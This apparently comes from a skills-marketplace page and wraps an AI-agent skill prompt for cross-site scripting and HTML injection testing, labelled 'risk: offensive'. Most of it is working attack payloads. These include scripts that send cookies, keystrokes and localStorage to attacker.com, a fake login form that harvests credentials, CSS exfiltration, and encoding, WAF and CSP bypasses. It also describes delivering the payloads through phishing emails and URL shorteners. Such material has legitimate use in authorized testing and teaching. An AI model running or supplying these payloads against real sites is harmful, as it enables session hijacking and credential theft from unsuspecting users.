[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"skill-746a5503-615f-4edc-93e7-48149fa7bed2":3,"$f0aLZ6O4OSA-LezlOc5IuDl1CQMvVDrlQNQI5Ee3rv7c":43},{"id":4,"title":5,"description":6,"categoryId":7,"moduleId":8,"tags":9,"prompt":10,"icon":11,"source":12,"sourceUrl":13,"authorId":14,"authorName":15,"isPublic":16,"stars":17,"runs":18,"createdAt":19,"updatedAt":19,"module":20,"category":27,"packages":34},"746a5503-615f-4edc-93e7-48149fa7bed2","xss-html-injection","对网络应用程序执行全面的客户端注入漏洞评估，以识别跨站脚本（XSS）和HTML注入缺陷，演示会话劫持和凭证窃取的利用技术，并验证输入清理和输出编码机制。","cat_coding_frontend","mod_coding","sickn33,coding","---\nname: xss-html-injection\ndescription: \"Execute comprehensive client-side injection vulnerability assessments on web applications to identify XSS and HTML injection flaws, demonstrate exploitation techniques for session hijacking and credential theft, and validate input sanitization and output encoding mechanisms.\"\nrisk: offensive\nsource: community\nauthor: zebbern\ndate_added: \"2026-02-27\"\n---\n\n> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.\n\n# Cross-Site Scripting and HTML Injection Testing\n\n## Purpose\n\nExecute comprehensive client-side injection vulnerability assessments on web applications to identify XSS and HTML injection flaws, demonstrate exploitation techniques for session hijacking and credential theft, and validate input sanitization and output encoding mechanisms. This skill enables systematic detection and exploitation across stored, reflected, and DOM-based attack vectors.\n\n## Inputs \u002F Prerequisites\n\n### Required Access\n- Target web application URL with user input fields\n- Burp Suite or browser developer tools for request analysis\n- Access to create test accounts for stored XSS testing\n- Browser with JavaScript console enabled\n\n### Technical Requirements\n- Understanding of JavaScript execution in browser context\n- Knowledge of HTML DOM structure and manipulation\n- Familiarity with HTTP request\u002Fresponse headers\n- Understanding of cookie attributes and session management\n\n### Legal Prerequisites\n- Written authorization for security testing\n- Defined scope including target domains and features\n- Agreement on handling of any captured session data\n- Incident response procedures established\n\n## Outputs \u002F Deliverables\n\n- XSS\u002FHTMLi vulnerability report with severity classifications\n- Proof-of-concept payloads demonstrating impact\n- Session hijacking demonstrations (controlled environment)\n- Remediation recommendations with CSP configurations\n\n## Core Workflow\n\n### Phase 1: Vulnerability Detection\n\n#### Identify Input Reflection Points\nLocate areas where user input is reflected in responses:\n\n```\n# Common injection vectors\n- Search boxes and query parameters\n- User profile fields (name, bio, comments)\n- URL fragments and hash values\n- Error messages displaying user input\n- Form fields with client-side validation only\n- Hidden form fields and parameters\n- HTTP headers (User-Agent, Referer)\n```\n\n#### Basic Detection Testing\nInsert test strings to observe application behavior:\n\n```html\n\u003C!-- Basic reflection test -->\n\u003Ctest123>\n\n\u003C!-- Script tag test -->\n\u003Cscript>alert('XSS')\u003C\u002Fscript>\n\n\u003C!-- Event handler test -->\n\u003Cimg src=x onerror=alert('XSS')>\n\n\u003C!-- SVG-based test -->\n\u003Csvg onload=alert('XSS')>\n\n\u003C!-- Body event test -->\n\u003Cbody onload=alert('XSS')>\n```\n\nMonitor for:\n- Raw HTML reflection without encoding\n- Partial encoding (some characters escaped)\n- JavaScript execution in browser console\n- DOM modifications visible in inspector\n\n#### Determine XSS Type\n\n**Stored XSS Indicators:**\n- Input persists after page refresh\n- Other users see injected content\n- Content stored in database\u002Ffilesystem\n\n**Reflected XSS Indicators:**\n- Input appears only in current response\n- Requires victim to click crafted URL\n- No persistence across sessions\n\n**DOM-Based XSS Indicators:**\n- Input processed by client-side JavaScript\n- Server response doesn't contain payload\n- Exploitation occurs entirely in browser\n\n### Phase 2: Stored XSS Exploitation\n\n#### Identify Storage Locations\nTarget areas with persistent user content:\n\n```\n- Comment sections and forums\n- User profile fields (display name, bio, location)\n- Product reviews and ratings\n- Private messages and chat systems\n- File upload metadata (filename, description)\n- Configuration settings and preferences\n```\n\n#### Craft Persistent Payloads\n\n```html\n\u003C!-- Cookie stealing payload -->\n\u003Cscript>\ndocument.location='http:\u002F\u002Fattacker.com\u002Fsteal?c='+document.cookie\n\u003C\u002Fscript>\n\n\u003C!-- Keylogger injection -->\n\u003Cscript>\ndocument.onkeypress=function(e){\n  new Image().src='http:\u002F\u002Fattacker.com\u002Flog?k='+e.key;\n}\n\u003C\u002Fscript>\n\n\u003C!-- Session hijacking -->\n\u003Cscript>\nfetch('http:\u002F\u002Fattacker.com\u002Fcapture',{\n  method:'POST',\n  body:JSON.stringify({cookies:document.cookie,url:location.href})\n})\n\u003C\u002Fscript>\n\n\u003C!-- Phishing form injection -->\n\u003Cdiv id=\"login\">\n\u003Ch2>Session Expired - Please Login\u003C\u002Fh2>\n\u003Cform action=\"http:\u002F\u002Fattacker.com\u002Fphish\" method=\"POST\">\nUsername: \u003Cinput name=\"user\">\u003Cbr>\nPassword: \u003Cinput type=\"password\" name=\"pass\">\u003Cbr>\n\u003Cinput type=\"submit\" value=\"Login\">\n\u003C\u002Fform>\n\u003C\u002Fdiv>\n```\n\n### Phase 3: Reflected XSS Exploitation\n\n#### Construct Malicious URLs\nBuild URLs containing XSS payloads:\n\n```\n# Basic reflected payload\nhttps:\u002F\u002Ftarget.com\u002Fsearch?q=\u003Cscript>alert(document.domain)\u003C\u002Fscript>\n\n# URL-encoded payload\nhttps:\u002F\u002Ftarget.com\u002Fsearch?q=%3Cscript%3Ealert(1)%3C\u002Fscript%3E\n\n# Event handler in parameter\nhttps:\u002F\u002Ftarget.com\u002Fpage?name=\">\u003Cimg src=x onerror=alert(1)>\n\n# Fragment-based (for DOM XSS)\nhttps:\u002F\u002Ftarget.com\u002Fpage#\u003Cscript>alert(1)\u003C\u002Fscript>\n```\n\n#### Delivery Methods\nTechniques for delivering reflected XSS to victims:\n\n```\n1. Phishing emails with crafted links\n2. Social media message distribution\n3. URL shorteners to obscure payload\n4. QR codes encoding malicious URLs\n5. Redirect chains through trusted domains\n```\n\n### Phase 4: DOM-Based XSS Exploitation\n\n#### Identify Vulnerable Sinks\nLocate JavaScript functions that process user input:\n\n```javascript\n\u002F\u002F Dangerous sinks\ndocument.write()\ndocument.writeln()\nelement.innerHTML\nelement.outerHTML\nelement.insertAdjacentHTML()\neval()\nsetTimeout()\nsetInterval()\nFunction()\nlocation.href\nlocation.assign()\nlocation.replace()\n```\n\n#### Identify Sources\nLocate where user-controlled data enters the application:\n\n```javascript\n\u002F\u002F User-controllable sources\nlocation.hash\nlocation.search\nlocation.href\ndocument.URL\ndocument.referrer\nwindow.name\npostMessage data\nlocalStorage\u002FsessionStorage\n```\n\n#### DOM XSS Payloads\n\n```javascript\n\u002F\u002F Hash-based injection\nhttps:\u002F\u002Ftarget.com\u002Fpage#\u003Cimg src=x onerror=alert(1)>\n\n\u002F\u002F URL parameter injection (processed client-side)\nhttps:\u002F\u002Ftarget.com\u002Fpage?default=\u003Cscript>alert(1)\u003C\u002Fscript>\n\n\u002F\u002F PostMessage exploitation\n\u002F\u002F On attacker page:\n\u003Ciframe src=\"https:\u002F\u002Ftarget.com\u002Fvulnerable\">\u003C\u002Fiframe>\n\u003Cscript>\nframes[0].postMessage('\u003Cimg src=x onerror=alert(1)>','*');\n\u003C\u002Fscript>\n```\n\n### Phase 5: HTML Injection Techniques\n\n#### Reflected HTML Injection\nModify page appearance without JavaScript:\n\n```html\n\u003C!-- Content injection -->\n\u003Ch1>SITE HACKED\u003C\u002Fh1>\n\n\u003C!-- Form hijacking -->\n\u003Cform action=\"http:\u002F\u002Fattacker.com\u002Fcapture\">\n\u003Cinput name=\"credentials\" placeholder=\"Enter password\">\n\u003Cbutton>Submit\u003C\u002Fbutton>\n\u003C\u002Fform>\n\n\u003C!-- CSS injection for data exfiltration -->\n\u003Cstyle>\ninput[value^=\"a\"]{background:url(http:\u002F\u002Fattacker.com\u002Fa)}\ninput[value^=\"b\"]{background:url(http:\u002F\u002Fattacker.com\u002Fb)}\n\u003C\u002Fstyle>\n\n\u003C!-- iframe injection -->\n\u003Ciframe src=\"http:\u002F\u002Fattacker.com\u002Fphishing\" style=\"position:absolute;top:0;left:0;width:100%;height:100%\">\u003C\u002Fiframe>\n```\n\n#### Stored HTML Injection\nPersistent content manipulation:\n\n```html\n\u003C!-- Marquee disruption -->\n\u003Cmarquee>Important Security Notice: Your account is compromised!\u003C\u002Fmarquee>\n\n\u003C!-- Style override -->\n\u003Cstyle>body{background:red !important;}\u003C\u002Fstyle>\n\n\u003C!-- Hidden content with CSS -->\n\u003Cdiv style=\"position:fixed;top:0;left:0;width:100%;background:white;z-index:9999;\">\nFake login form or misleading content here\n\u003C\u002Fdiv>\n```\n\n### Phase 6: Filter Bypass Techniques\n\n#### Tag and Attribute Variations\n\n```html\n\u003C!-- Case variation -->\n\u003CScRiPt>alert(1)\u003C\u002FsCrIpT>\n\u003CIMG SRC=x ONERROR=alert(1)>\n\n\u003C!-- Alternative tags -->\n\u003Csvg\u002Fonload=alert(1)>\n\u003Cbody\u002Fonload=alert(1)>\n\u003Cmarquee\u002Fonstart=alert(1)>\n\u003Cdetails\u002Fopen\u002Fontoggle=alert(1)>\n\u003Cvideo>\u003Csource onerror=alert(1)>\n\u003Caudio src=x onerror=alert(1)>\n\n\u003C!-- Malformed tags -->\n\u003Cimg src=x onerror=alert(1)\u002F\u002F\n\u003Cimg \"\"\">\u003Cscript>alert(1)\u003C\u002Fscript>\">\n```\n\n#### Encoding Bypass\n\n```html\n\u003C!-- HTML entity encoding -->\n\u003Cimg src=x onerror=alert(1)>\n\n\u003C!-- Hex encoding -->\n\u003Cimg src=x onerror=alert(1)>\n\n\u003C!-- Unicode encoding -->\n\u003Cscript>\\u0061lert(1)\u003C\u002Fscript>\n\n\u003C!-- Mixed encoding -->\n\u003Cimg src=x onerror=\\u0061\\u006cert(1)>\n```\n\n#### JavaScript Obfuscation\n\n```javascript\n\u002F\u002F String concatenation\n\u003Cscript>eval('al'+'ert(1)')\u003C\u002Fscript>\n\n\u002F\u002F Template literals\n\u003Cscript>alert`1`\u003C\u002Fscript>\n\n\u002F\u002F Constructor execution\n\u003Cscript>[].constructor.constructor('alert(1)')()\u003C\u002Fscript>\n\n\u002F\u002F Base64 encoding\n\u003Cscript>eval(atob('YWxlcnQoMSk='))\u003C\u002Fscript>\n\n\u002F\u002F Without parentheses\n\u003Cscript>alert`1`\u003C\u002Fscript>\n\u003Cscript>throw\u002Fa]a]\u002F.source+onerror=alert\u003C\u002Fscript>\n```\n\n#### Whitespace and Comment Bypass\n\n```html\n\u003C!-- Tab\u002Fnewline insertion -->\n\u003Cimg src=x\tonerror\n=alert(1)>\n\n\u003C!-- JavaScript comments -->\n\u003Cscript>\u002F**\u002Falert(1)\u002F**\u002F\u003C\u002Fscript>\n\n\u003C!-- HTML comments in attributes -->\n\u003Cimg src=x onerror=\"alert(1)\"\u003C!--comment-->\n```\n\n## Quick Reference\n\n### XSS Detection Checklist\n```\n1. Insert \u003Cscript>alert(1)\u003C\u002Fscript> → Check execution\n2. Insert \u003Cimg src=x onerror=alert(1)> → Check event handler\n3. Insert \">\u003Cscript>alert(1)\u003C\u002Fscript> → Test attribute escape\n4. Insert javascript:alert(1) → Test href\u002Fsrc attributes\n5. Check URL hash handling → DOM XSS potential\n```\n\n### Common XSS Payloads\n\n| Context | Payload |\n|---------|---------|\n| HTML body | `\u003Cscript>alert(1)\u003C\u002Fscript>` |\n| HTML attribute | `\">\u003Cscript>alert(1)\u003C\u002Fscript>` |\n| JavaScript string | `';alert(1)\u002F\u002F` |\n| JavaScript template | `${alert(1)}` |\n| URL attribute | `javascript:alert(1)` |\n| CSS context | `\u003C\u002Fstyle>\u003Cscript>alert(1)\u003C\u002Fscript>` |\n| SVG context | `\u003Csvg onload=alert(1)>` |\n\n### Cookie Theft Payload\n```javascript\n\u003Cscript>\nnew Image().src='http:\u002F\u002Fattacker.com\u002Fc='+btoa(document.cookie);\n\u003C\u002Fscript>\n```\n\n### Session Hijacking Template\n```javascript\n\u003Cscript>\nfetch('https:\u002F\u002Fattacker.com\u002Flog',{\n  method:'POST',\n  mode:'no-cors',\n  body:JSON.stringify({\n    cookies:document.cookie,\n    localStorage:JSON.stringify(localStorage),\n    url:location.href\n  })\n});\n\u003C\u002Fscript>\n```\n\n## Constraints and Guardrails\n\n### Operational Boundaries\n- Never inject payloads that could damage production systems\n- Limit cookie\u002Fsession capture to demonstration purposes only\n- Avoid payloads that could spread to unintended users (worm behavior)\n- Do not exfiltrate real user data beyond scope requirements\n\n### Technical Limitations\n- Content Security Policy (CSP) may block inline scripts\n- HttpOnly cookies prevent JavaScript access\n- SameSite cookie attributes limit cross-origin attacks\n- Modern frameworks often auto-escape outputs\n\n### Legal and Ethical Requirements\n- Written authorization required before testing\n- Report critical XSS vulnerabilities immediately\n- Handle captured credentials per data protection agreements\n- Do not use discovered vulnerabilities for unauthorized access\n\n## Examples\n\n### Example 1: Stored XSS in Comment Section\n\n**Scenario**: Blog comment feature vulnerable to stored XSS\n\n**Detection**:\n```\nPOST \u002Fapi\u002Fcomments\nContent-Type: application\u002Fjson\n\n{\"body\": \"\u003Cscript>alert('XSS')\u003C\u002Fscript>\", \"postId\": 123}\n```\n\n**Observation**: Comment renders and script executes for all viewers\n\n**Exploitation Payload**:\n```html\n\u003Cscript>\nvar i = new Image();\ni.src = 'https:\u002F\u002Fattacker.com\u002Fsteal?cookie=' + encodeURIComponent(document.cookie);\n\u003C\u002Fscript>\n```\n\n**Result**: Every user viewing the comment has their session cookie sent to attacker's server.\n\n### Example 2: Reflected XSS via Search Parameter\n\n**Scenario**: Search results page reflects query without encoding\n\n**Vulnerable URL**:\n```\nhttps:\u002F\u002Fshop.example.com\u002Fsearch?q=test\n```\n\n**Detection Test**:\n```\nhttps:\u002F\u002Fshop.example.com\u002Fsearch?q=\u003Cscript>alert(document.domain)\u003C\u002Fscript>\n```\n\n**Crafted Attack URL**:\n```\nhttps:\u002F\u002Fshop.example.com\u002Fsearch?q=%3Cimg%20src=x%20onerror=%22fetch('https:\u002F\u002Fattacker.com\u002Flog?c='+document.cookie)%22%3E\n```\n\n**Delivery**: URL sent via phishing email to target user.\n\n### Example 3: DOM-Based XSS via Hash Fragment\n\n**Scenario**: JavaScript reads URL hash and inserts into DOM\n\n**Vulnerable Code**:\n```javascript\ndocument.getElementById('welcome').innerHTML = 'Hello, ' + location.hash.slice(1);\n```\n\n**Attack URL**:\n```\nhttps:\u002F\u002Fapp.example.com\u002Fdashboard#\u003Cimg src=x onerror=alert(document.cookie)>\n```\n\n**Result**: Script executes entirely client-side; payload never touches server.\n\n### Example 4: CSP Bypass via JSONP Endpoint\n\n**Scenario**: Site has CSP but allows trusted CDN\n\n**CSP Header**:\n```\nContent-Security-Policy: script-src 'self' https:\u002F\u002Fcdn.trusted.com\n```\n\n**Bypass**: Find JSONP endpoint on trusted domain:\n```html\n\u003Cscript src=\"https:\u002F\u002Fcdn.trusted.com\u002Fapi\u002Fjsonp?callback=alert\">\u003C\u002Fscript>\n```\n\n**Result**: CSP bypassed using allowed script source.\n\n## Troubleshooting\n\n| Issue | Solutions |\n|-------|-----------|\n| Script not executing | Check CSP blocking; verify encoding; try event handlers (img, svg onerror); confirm JS enabled |\n| Payload appears but doesn't execute | Break out of attribute context with `\"` or `'`; check if inside comment; test different contexts |\n| Cookies not accessible | Check HttpOnly flag; try localStorage\u002FsessionStorage; use no-cors mode |\n| CSP blocking payloads | Find JSONP on whitelisted domains; check for unsafe-inline; test base-uri bypass |\n| WAF blocking requests | Use encoding variations; fragment payload; null bytes; case variations |\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.\n","","imported","https:\u002F\u002Fgithub.com\u002Fsickn33\u002Fantigravity-awesome-skills","user_system_seed","SkillOPIC",true,98,801,"2026-05-16 13:47:55",{"id":8,"name":21,"slug":22,"icon":23,"description":24,"sort":25,"createdAt":26},"编程开发","coding","mdi-code-braces","代码生成、调试、审查，提升开发效率",2,"2026-05-16 12:53:40",{"id":7,"name":28,"slug":29,"icon":30,"description":31,"moduleId":8,"sort":32,"skillCount":33,"createdAt":26},"前端开发","frontend","mdi-language-html5","HTML\u002FCSS\u002FJavaScript\u002F框架相关",1,96,[35],{"id":36,"skillId":4,"version":37,"fileName":38,"fileSize":39,"filePath":40,"fileHash":41,"manifest":42,"createdAt":19},"23a3bf31-5d02-49ba-8b86-73d939656781","1.0.0","xss-html-injection.zip",5175,"uploads\u002Fskills\u002F746a5503-615f-4edc-93e7-48149fa7bed2\u002Fxss-html-injection.zip","d5b019bbb9a9af608f5e7d88092669a24bb93cdd73c34cae3f9ff01f0c97920b","[{\"path\":\"SKILL.md\",\"isDirectory\":false,\"size\":13379}]",{"code":44,"message":45,"data":46},200,"success",{"items":47,"stats":48,"page":51},[],{"averageRating":49,"totalRatings":49,"ratingCounts":50},0,[49,49,49,49,49],{"limit":52,"offset":49,"hasMore":53,"nextOffset":52,"ratedOnly":16},15,false]